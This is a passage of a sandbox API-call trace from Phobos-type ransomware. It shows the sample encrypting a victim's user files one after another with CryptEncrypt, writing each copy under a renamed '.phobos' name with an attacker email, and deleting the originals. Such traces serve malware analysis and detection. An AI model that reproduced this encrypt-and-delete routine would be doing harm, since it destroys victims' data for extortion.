HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 0x20 [0199.121] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.121] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.121] SetFilePointerEx (in: hFile=0x118, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.121] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.122] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.122] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.122] ReadFile (in: hFile=0x118, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x122, lpOverlapped=0x0) returned 1 [0199.123] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x130, dwBufLen=0x130 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x130) returned 1 [0199.123] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x130, lpOverlapped=0x0) returned 1 [0199.124] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0199.124] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.124] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.124] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.124] WriteFile (in: hFile=0x16c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.124] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.124] CloseHandle (hObject=0x118) returned 1 [0199.124] CloseHandle (hObject=0x16c) returned 1 [0199.124] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\shows desktop.lnk")) returned 1 [0199.125] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.125] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.126] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2269) returned 1 [0199.126] CloseHandle (hObject=0x16c) returned 1 [0199.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk")) returned 0x20 [0199.126] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.126] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0199.290] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.290] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.291] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa329e8) returned 1 [0199.291] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.291] ReadFile (in: hFile=0x16c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x8dd, lpOverlapped=0x0) returned 1 [0199.292] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0, dwBufLen=0x8e0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x8e0) returned 1 [0199.292] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x8e0, lpOverlapped=0x0) returned 1 [0199.293] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0199.293] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.293] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.293] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.293] WriteFile (in: hFile=0x118, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.293] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.293] CloseHandle (hObject=0x16c) returned 1 [0199.293] CloseHandle (hObject=0x118) returned 1 [0199.293] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Google Chrome.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\taskbar\\google chrome.lnk")) returned 1 [0199.295] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.295] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x118 [0199.296] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=0) returned 1 [0199.296] CloseHandle (hObject=0x118) returned 1 [0199.297] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.465] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=37762) returned 1 [0199.465] CloseHandle (hObject=0x178) returned 1 [0199.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl")) returned 0x2020 [0199.465] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0199.465] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.465] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.465] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.466] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ce8) returned 1 [0199.466] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.466] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9382, lpOverlapped=0x0) returned 1 [0199.467] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9390, dwBufLen=0x9390 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9390) returned 1 [0199.467] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9390, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9390, lpOverlapped=0x0) returned 1 [0199.469] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0199.469] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.469] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.469] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.469] WriteFile (in: hFile=0x160, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.469] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.469] CloseHandle (hObject=0x178) returned 1 [0199.469] CloseHandle (hObject=0x160) returned 1 [0199.469] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl")) returned 1 [0199.470] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.471] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2560) returned 1 [0199.471] CloseHandle (hObject=0x160) returned 1 [0199.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs")) returned 0x2020 [0199.471] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0199.471] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.471] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.471] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0199.490] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32be8) returned 1 [0199.490] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.490] ReadFile (in: hFile=0x160, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa00, lpOverlapped=0x0) returned 1 [0199.616] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa10, dwBufLen=0xa10 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa10) returned 1 [0199.616] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa10, lpOverlapped=0x0) returned 1 [0199.617] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32aa8) returned 1 [0199.617] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.617] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.617] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.617] WriteFile (in: hFile=0xac, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.617] CryptDestroyKey (hKey=0xa32be8) returned 1 [0199.617] CloseHandle (hObject=0x160) returned 1 [0199.617] CloseHandle (hObject=0xac) returned 1 [0199.617] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs")) returned 1 [0199.618] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.618] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.777] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2692) returned 1 [0199.777] CloseHandle (hObject=0x140) returned 1 [0199.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk")) returned 0x20 [0199.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0199.778] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.778] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.781] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32aa8) returned 1 [0199.782] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.782] ReadFile (in: hFile=0x140, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa84, lpOverlapped=0x0) returned 1 [0199.783] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa90, dwBufLen=0xa90 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa90) returned 1 [0199.783] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa90, lpOverlapped=0x0) returned 1 [0199.784] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32b68) returned 1 [0199.784] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.784] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.784] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.784] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.784] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.784] CloseHandle (hObject=0x140) returned 1 [0199.784] CloseHandle (hObject=0x174) returned 1 [0199.785] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0fkEaIWh1k-ezLz_8.lnk" (normalized: "c:\\users\\5p5nrgjn0js 